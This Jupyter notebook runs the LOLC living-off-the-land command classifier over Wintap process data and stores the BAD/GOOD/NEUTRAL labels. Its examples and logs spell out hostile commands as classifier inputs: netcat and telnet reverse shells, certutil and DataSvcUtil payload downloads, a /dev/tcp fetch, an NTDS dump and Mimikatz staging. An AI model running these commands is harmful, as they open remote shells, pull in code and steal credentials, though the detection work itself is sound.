# Deriving labels for Wintap LOL using the "Living off the Land Classifier (LOLC)"
Source: (https://github.com/adobe/libLOL)

LOLC has pre-trained models for Linux and Windows LOL commands. In this notebook, we'll run all the unique commands+args found in a Wintap dataset thru LOLC and save off the results.

## Python Setup Instructions
Note: LOLC is very tempermental and this is the best cross-platform setup we've found so far.

```
conda create -n lolc python=3.8
conda activate lolc
pip install lolc
pip install scikit-learn==0.24.2
```

## Examples for Linux and Windows
Notes:
* Platform type refers to the data model that will be used for checking commands, not the platform you're running on.
* When selecting WINDOWS, there may be spurious errors when the model is first loaded. These can be ignored.
    * The errors start with `Invalid command: `
* When running the lolc function, it will generate misc log messages which can also be ignored.

In [1]:
from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['nc -nlvp 1234 & nc -e /bin/bash 10.20.30.40 4321',
          'iptables -t nat -L -n',
          'telnet 10.20.30.40 5000 | /bin/sh | 10.20.30.50 5001']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("")

1
0
1
nc -nlvp 1234 & nc -e /bin/bash 10.20.30.40 4321
BAD
KEYWORD_-E COMMAND_NC IP_PRIVATE nc_e_sh KEYWORD_-NLVP PATH_/BIN/BASH

iptables -t nat -L -n
GOOD
KEYWORD_-L iptables_list KEYWORD_-T KEYWORD_-N COMMAND_IPTABLES

telnet 10.20.30.40 5000 | /bin/sh | 10.20.30.50 5001
BAD
telnet_sh IP_PRIVATE PATH_/BIN/SH COMMAND_TELNET pipe_bin_sh



[Parallel(n_jobs=4)]: Using backend ThreadingBackend with 4 concurrent workers.
[Parallel(n_jobs=4)]: Done  33 tasks      | elapsed:    0.0s
[Parallel(n_jobs=4)]: Done  50 out of  50 | elapsed:    0.0s finished


In [2]:
from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\\temp:ttt',
          'explorer.exe c:\\temp',
          'DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://11.11.11.11/xxxxxxxxx?encodedfile']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("")

Invalid command: 
ntdsutil.exe "ac i ntds" "ifm" "create full c:\\" q q


Invalid command: 
wsl.exe --exec bash -c \'cat < /dev/tcp/192.168.1.10/54 > binary\'


Invalid command: 
copy C:\Users\Administrator\Downloads\build.xml \\10.10.10.10\C$\Windows\Temp\


Invalid command: 
powershell Copy-Item -Path .\Invoke-Mimikatz.ps1 -ToSession $sess -Destination "C:\Users\public\"


Invalid command: 
wmic shadowcopy call create Volume='C:\'


Invalid command: 
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\


1
1
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
BAD
KEYWORD_dash_urlcache powershell_file COMMAND_CERTUTIL.EXE KEYWORD_http certutil_downloader KEYWORD_dash_f

explorer.exe c:\temp
NEUTRAL


DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://11.11.11.11/xxxxxxxxx?encodedfile
BAD
IP_PUBLIC DataSvcUtil_http KEYWORD_http COMMAND_DATASVCUTIL



[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished


# Run against a Wintap Dataset
The strategy here is to extract all of the unique command+args from the PROCESS table. Then pass those into lolc(), effectively one at a time. Save off the results in parquet file that can be joined back up on command+arg.

Note that as we need 2 values back (classification and tag), there is some messiness involved. Basically, have the function return a string, then later split that string. Yuck.

In [3]:
import duckdb
from duckdb.typing import VARCHAR
from lol.api import LOLC, PlatformType

%load_ext magic_duckdb
con = duckdb.connect()
%dql -co con
lolc=LOLC(PlatformType.WINDOWS)

# Define wintap data needed
%dql create view process_uber_summary as from '/Users/johnson30/data/wintapv6/ACME4/stdview-20240819-20240923/process_uber_summary.parquet'
%dql create view lolbas AS FROM read_csv_auto('/Users/johnson30/data/wintapv6/lookups/benignware/lolbas.csv',header=true,normalize_names=1)

# Define function to call lolc and register with DuckDB
def is_bad(cmd:str) -> str:
    classification, tags = lolc([cmd])
    # TODO: Figure out how to return a tuple or list?
    return classification[0]+"|"+tags[0]

con.create_function("lol_is_bad", is_bad)



Invalid command: 
ntdsutil.exe "ac i ntds" "ifm" "create full c:\\" q q


Invalid command: 
wsl.exe --exec bash -c \'cat < /dev/tcp/192.168.1.10/54 > binary\'


Invalid command: 
copy C:\Users\Administrator\Downloads\build.xml \\10.10.10.10\C$\Windows\Temp\


Invalid command: 
powershell Copy-Item -Path .\Invoke-Mimikatz.ps1 -ToSession $sess -Destination "C:\Users\public\"


Invalid command: 
wmic shadowcopy call create Volume='C:\'


Invalid command: 
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\




## Call as a function in DuckDB!

In [4]:
sql='''
create or replace table lolc_results
as
select *,
    -- No easy way to re-use the function call, so just duplicate it.
    --lolc_sez: lol_is_bad(concat_ws(' ',process_name, args)),
    lolc_class: split(lol_is_bad(concat_ws(' ',process_name, args)),'|')[1],
    lolc_tag: if(lolc_class == 'NEUTRAL', null, split(lol_is_bad(concat_ws(' ',process_name, args)),'|')[2])
from (
    select p.process_name, p.args, list(distinct command_category) lolbas_cats, count(*) num_rows
    from main.process_uber_summary p
    join lolbas l on lower(l.filename)=p.process_name
    group by all
)
'''
con.sql(sql)


[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
/Users/johnson30/anaconda3/envs/lolc/lib/python3.8/site-packages/nltk/translate/bleu_score.py:577: UserWarning: 
The hypothesis contains 0 counts of 3-gram overlaps.
Therefore the BLEU score evaluates to 0, independently of
how many N-gram overlaps of lower order it contains.
Consider using lower n-gram order or use SmoothingFunction()
  warn

0
0
0
0


[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.1s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.1s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.1s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.1s finished
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.1s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.1s finished
[Paralle

0
0
0
0
0
0
0


[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.1s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.1s finished
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.1s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.1s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.1s finished
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.1s remaining:    0.

...

[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   

0
0
0
0
0
0
0
0
0


[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   

0
0
0
0
0
0
1
0
0
0
1
0
0
1
1
0
0


[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elapsed:    0.0s remaining:    0.0s
[Parallel(n_jobs=16)]: Done  50 out of  50 | elapsed:    0.0s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done   9 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done  45 out of  50 | elaps

In [5]:
%dql show tables

name
0                lolbas
1          lolc_results
2  process_uber_summary

In [6]:
%dql select lolc_class, count(distinct lolc_tag), sum(num_rows), count(*) from lolc_results group by all order by all

lolc_class  count(DISTINCT lolc_tag)  sum(num_rows)  count_star()
0        BAD                        37          845.0            71
1       GOOD                       177        20074.0           602
2    NEUTRAL                         0      3930734.0          6035

# Copy to parquet file
For now, just copy to local directory. 

In [7]:
%dql copy lolc_results to 'lolc_results.parquet' (format parquet)

Count
0   6708